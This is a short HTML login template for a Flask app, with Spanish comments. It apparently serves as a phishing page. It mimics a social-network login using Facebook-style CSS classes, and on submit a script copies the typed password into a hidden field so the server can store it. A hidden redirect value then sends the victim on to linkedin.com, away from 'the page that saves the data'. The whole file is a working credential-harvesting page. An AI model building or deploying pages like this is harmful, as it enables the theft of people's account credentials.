<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>MY TEMPLATE</title>
	<link rel="stylesheet" href="">

<!-- JS para cuando se envíe el formulario, le agregue
el valor de la contraseña al input auxiliar oculto, ya que la
contraseña no se puede obtener con flask, por seguridad
cuando intentamos acceder a ella la define como NONE -->
<script type="text/javascript" charset="utf-8">
	function prepare_password(){
		auxPass = document.querySelector('input[name="auxpass"]');
		originalPass = document.querySelector('input[name="pass"]');

		auxPass.value = originalPass.value;
	}
</script>

</head>
<body>

	<form action="{{ url_for('login') }}" onsubmit="prepare_password();" method="POST" accept-charset="utf-8">

<!--     Input para redireccionar la página que guarda los datos -->
	<input type="hidden" name="redirectvalue" value="https://www.linkedin.com" placeholder="">		
		
<!--     Input para el usuario -->
		<input type="text" class="inputtext _55r1 _6luy" name="email" placeholder="Email" />

<!--     Input para la contraseña -->
		<input type="password" name="pass" placeholder="Contraseñass"/>
<!--     Input auxiliar para enviar la contraseña -->
	  <input type="hidden" name="auxpass" value="" placeholder="">

	  <button type="submit">Enviar</button>

	</form>
	
</body>
</html>